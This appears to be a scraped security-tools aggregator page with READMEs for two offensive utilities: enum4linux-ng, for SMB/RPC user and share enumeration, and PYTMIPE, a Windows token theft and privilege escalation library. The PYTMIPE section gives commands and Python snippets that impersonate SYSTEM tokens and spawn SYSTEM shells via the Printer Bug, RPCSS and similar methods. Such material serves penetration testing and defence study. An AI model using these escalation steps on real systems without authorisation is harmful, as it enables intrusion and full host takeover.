-k USERS User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none). Used to get sid with "lookupsid known_username"
-r RANGES RI D ranges to enumerate (default: 500-550,1000-1050)
-s SHARES_FILE Brute force guessing for shares
-t TIMEOUT Sets connection timeout in seconds (default: 5s)
-v Verbose, show full samba tools commands being run (net, rpcclient, etc.)
--keep Don't delete the Samba configuration file created during tool run after enumeration (useful with -v)
-oJ OUT_JSON_FILE Writes output to JSON file (extension is added automatically)
-oY OUT_YAML_FILE Writes output to YAML file (extension is added automatically)
-oA OUT_FILE Writes output to YAML and JSON file (extensions are added automatically)

Installing dependencies

The tool uses the samba clients tools, namely:

  • nmblookup
  • net
  • rpcclient
  • smbclient

These should be available for all Linux distributions. The package is typically called smbclient, samba-client or something similar.

In addition, you will need the following Python packages:

  • ldap3
  • PyYaml
  • impacket

For a faster processing of YAML (optional!) also install (should come as a dependcy for PyYaml for most Linux distributions):

  • LibYAML

Some examples for specific Linux distributions installations are listed below. Alternatively, distribution-agnostic ways (python pip, python virtual env and Docker) are possible.


Linux distribution specific

For all distribution examples below, LibYAML is already a dependency of the corresponding PyYaml package and will be therefore installed automatically.


ArchLinux
#  pacman -S smbclient python-ldap3 python-yaml impacket

Fedora/CentOS/RHEL

(tested on Fedora Workstation 31)

# dnf install samba-common-tools samba-client python3-ldap3 python3-pyyaml python3-impacket

Kali Linux/Debian/Ubuntu

(tested on Kali Linux 2020.1, recent Debian (e.g. Buster) or Ubuntu versions should work, for Ubuntu 18.04 or below use the Docker or Python virtual environment variant)

# apt install smbclient python3-ldap3 python3-yaml python3-impacket

Linux distribution-agnostic

Python pip

Depending on the Linux distribution either pip3 or pip is needed:

$ pip install pyyaml ldap3 impacket

Alternative:

$ pip install -r requirements.txt

Remember you need to still install the samba tools as mentioned above.


Python virtual environment
$ git clone https://github.com/cddmp/enum4linux-ng
$ cd enum4linux-ng
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install wheel
$ pip install -r requirements.txt

Then run via:

python3 enum4linux-ng.py -As <target>

Remember you need to still install the samba tools as mentioned above. In addition, make sure you run source venv/bin/activate everytime you spawn a new shell. Otherwise the wrong Python interpreter with the wrong libraries will be used (your system one rather than the virtual environment one).


Docker
$ git clone https://github.com/cddmp/enum4linux-ng
$ docker build enum4linux-ng --tag enum4linux-ng

Once finished an example run could look like this:

$ docker run -t enum4linux-ng -As <target>

Contribution and Support

Occassionally, the tool will spit out error messages like this:

Could not <some text here>, please open a GitHub issue

In that case, please rerun the tool with the -v and --keep option. This will allow you to see the exact command which caused the error message. Copy that command, run it in your terminal and redirect the output to a file. Then open a GitHub issue here, pasting the command and attaching the error output file. That helps to debug the issue. Of course, you can debug it yourself and make a pull request.

If the tool is helpful for you, I'm happy if you leave a star!



Pytmipe - Python Library And Client For Token Manipulations And Impersonations For Privilege Escalation On Windows

$
0
0


PYTMIPE (PYthon library for Token Manipulation and Impersonation for Privilege Escalation) is a Python 3 library for manipulating Windows tokens and managing impersonations in order to gain more privileges on Windows. TMIPE is the python 3 client which uses the pytmipe library.


Content
  • A python client: tmipe (python3 tmipe.py)
  • A python library: pytmipe. Useful for including this project in another one
  • pytinstaller examples, for getting standalones exes

Docs
  • Slides "Windows Token Manipulation, Impersonation & Privilege Escalation" (English): link

  • Article in MISC 112 (French): link


Main features
MethodRequired Privilege(s)OS (no exhaustive)Direct target (max)
Token creation & impersonationusername & passwordAlllocal administrator
Token Impersonation/TheftSeDebugPrivilegeAllnt authority\system
Parent PID spoofing (handle inheritance)SeDebugPrivilege>= Vistant authority\system
Service (SCM)Local administrator (and high integrity level if UAC enabled)Allnt authority\system or domain account
WMI EventLocal administrator (and high integrity level if UAC enabled)Allnt authority\system
« Printer Bug » LPESeImpersonatePrivilege (Service account)Windows 8.1, 10 & Server 2012R2/2016/2019nt authority\system
RPCSS Service LPESeImpersonatePrivilege (Service account)Windows 10 & Server 2016/2019nt authority\system

Capabilities

The following non-exhaustive list shows some features implemented in pytmipe library:

  • Token and privileges management:
    • get, enable or disable privilege(s) on token for current or remote thread
    • get local or remote token information
    • get effective token for current thread (impersonation or primary token)
  • get many information about selected token(s):
    • elevation type, impersonation type, Linked token with details, SID, ACLs, default groups, primary group, owner, privileges, source
    • etc
  • List all tokens which are accessible (primary & impersonation tokens) from current thread:
    • 2 different methods implemented: "thread" method and "handle" method (favorite)
    • check if token can be impersonated
    • get information about each token (elevation type, impersonation type, Linked token, SID, etc)
    • get all tokens which are accessible by account name (SID)
  • Impersonate a token or user:
    • Make Token and Impersonate (requires credentials of user)
    • Token impersonation/theft (specific privileges are required): impersonate a chosen token
    • Create Process with a token (specific privileges are required): impersonate a chosen token and create new process
    • Impersonate first nt authority\system token found
    • impersonate primary token of remote process with pid
  • Escalation methods:
    • Parent PID Spoofing - Handle Inheritance
    • Service Manager via direct command or named pipe impersonation: local administrator to nt authority\system (or orther privileged account)
    • Task scheduler via direct command or named pipe impersonation: local administrator to nt authority\system
    • WMI job via direct command or named pipe impersonation: local administrator to nt authority\system
    • Printer Bug: SeImpersonatePrivilege to nt authority\system
    • RPCSS: SeImpersonatePrivilege to nt authority\system
    • Re enable privileges via task scheduling and named pipe impersonation

Dependencies

ctypes is used a maximum of time. Many features of pywin32 have been re developped in pytmipe to avoid the use of pywin32 for better portability. However, Task Scheduler module still uses pywin32 (more precisely pythoncom) by lack of time. All other modules uses ctypes only.


HOW TO USE

For python client (named tmipe):

python.exe tmipe.py -h
usage: tmipe.py [-h] [--version]
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
...

**
888888 8b d8 88 88""Yb 888888
88 88b d88 88 88__dP 88__
88 88YbdP88 88 88""" 88""
88 88 YY 88 88 88 888888
-------------------------------------------
Token Manipulation, Impersonation and
Privilege Escalation (Tool)
-------------------------------------------
By Quentin HARDY (quentin.hardy@protonmail.com)

positional arguments:
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imp token,printerbug,rpcss,spoof,impuser,runas,scm}

Choose a main command
cangetadmin Check if user can get admin access
printalltokens Print all tokens accessible from current thread
printalltokensbyname
Print all tokens accessible from current thread by account name
printalltokensbypid Print all tokens accessible from current thread by pid
printsystemtokens Print all system tokens accessible from current
searchimpfirstsystem
search and impersonate first system token
imppid impersonate primary token of selected pid and try to spawn cmd.exe
imptoken impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe
printerbug exploit the "printer bug" for getting system shell
rpcss exploit "rpcss" for getting system shell
spoof parent PID Spoofing ("handle inheritance)"
impuser create process with creds with impersonation
runas create process with creds as runas
scm create process with Service Control Manager

optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit

For python library (named pytmipe), see source code and examples. Normally, I have well documented the source code... Most of functions are documented.

For pyinstaller examples and standalones, see files in src/examples/ folders.


Examples

If you want to know how to use pytimpe library, see src/examples folder for many examples.


Example 1: get nt authority\system

For impersonating the first system token and get a cmd.exe prompt as system from python client (tmipe):

python.exe tmipe.py searchimpfirstsystem -vv

For doing the same thing thanks to the pytmipe library directly, see the src/examples/searchAndImpersonateFirstSystemToken.py:

from impersonate import Impersonate
from utils import configureLogging

configureLogging()
imp = Impersonate()
imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)

It will open a cmd.exe prompt as system if the current Windows user has required rights.

Of course, from this source code, you can create a standlone exe with pyinstaller.


Example 2: get tokens

For getting primary and impersonation(s) tokens used in current process:

python.exe tmipe.py printalltokens --current --full --linked

Output:

- PID: 3212
------------------------------
- PID: 3212
- type: Primary (1)
- token: 764
- hval: None
- ihandle: None
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-32-544
- Groups:
- S-1-5-32-544: {'Name': 'Administrators', 'Domain': 'BUILTIN', 'type': 4} (ENABLED, ENABLED_BY_DEFAULT, OWNER)
- S-1-1-0: {'Name': 'Everyone', 'Domain': '', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-5-11: {'Name': 'Authenticated Users', 'Domain': 'NT AUTHORITY', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-16-16384: {'Name': 'System Mandatory Level', 'Domain': 'Mandatory Label', 'type': 10} (INTEGRITY_ENABLED, INTEGRITY)
- Privileges (User Rights):
- SeAssignPrimaryTokenPrivilege: Enabled
[...]
- SeTrustedCredManAccessPrivilege: Enabled
- issystem: True
- sessionID: 1
- elevationtype: Default (1)
- iselevated: True
- Linked Token: None
- tokensource: b'*SYSTEM*'
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Default DACL:
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0x10000000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-18'}
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0xa0020000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-32-544'}
[...]
- Mandatory Policy: NO_WRITE_UP

For getting all tokens which are accessible from current thread, organized by pid, when the impersonation is possible only:

python.exe tmipe.py printalltokensbypid --imp-only

Output:

[...]
- PID 4276:
- S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
- PID 7252:
- None
- PID 1660:
- S-1-5-21-28624056-3392308708-440876048-1106: DOMAIN\USER (possible imp: True)
- S-1-5-20: NT AUTHORITY\NETWORK SERVICE (possible imp: True)
- S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
- S-1-5-90-0-1: Window Manager\DWM-1 (possible imp: True)
- S-1-5-19: NT AUTHORITY\LOCAL SERVICE (possible imp: True)
[...]

If you want to do this operation with the pytmipe library, it is easy too:

from impersonate import Impersonate
from utils import configureLogging

configureLogging()
imp = Impersonate()
imp.printAllTokensAccessible(targetPID=None, printFull=True, printLinked=True, _useThreadMethod=False)

Example 3: impersonate token

You can impersonate a selected token.

First step, get all tokens according to your filters (system tokens and tokens which can be impersonated by current thread):

python.exe tmipe.py printalltokens --filter {\"sid\":\"S-1-5-18\",\"canimpersonate\":true}

Output:

[...]
- PID: 2288
------------------------------
- PID: 2288
- type: Impersonation (2)
- token: 2504
- ihandle: 118
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-18
- issystem: True
- elevationtype: Default (1)
- iselevated: True
- linkedtoken: None
- implevel: Impersonate (2)
- appcontainertoken: False
[...]
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Mandatory Policy: VALID_MASK
- canimpersonate: True
[...]

This previous output shows an impersonation token located in the pid 2288 (ihandle 118), which has an integrity level system. It is possible to impersonate this specific token with the following command:

python.exe tmipe.py imptoken --pid 2288 --ihandle 118 -vv

This previous command opens a cmd.exe as nt authority\system.

This can be done with the pytmipe library too. Following source code impersonates the first system token available, prints effective token and it stops impersonation:

from impersonate import Impersonate
from windef import TokenImpersonation

allTokens = imp.getTokensAccessibleFilter(targetPID=None,
filter={'canimpersonate':True, 'sid':'S-1-5-18', 'type':TokenImpersonation},
_useThreadMethod=False)
if allTokens == {} or allTokens==None:
print("No one token found for impersonation")
else:
pid = list(allTokens.keys())[0] #use the first token of the first pid returned in 'allTokens'
firstIHandle = allTokens[pid][0]['ihandle']
imp.printThisToken(allTokens, pid, firstIHandle)
imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
print("Current Effective token for current thread after impersonation:")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
imp.terminateImpersonation()
print("Current Effective token for current thread (impe rsonation finished):")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>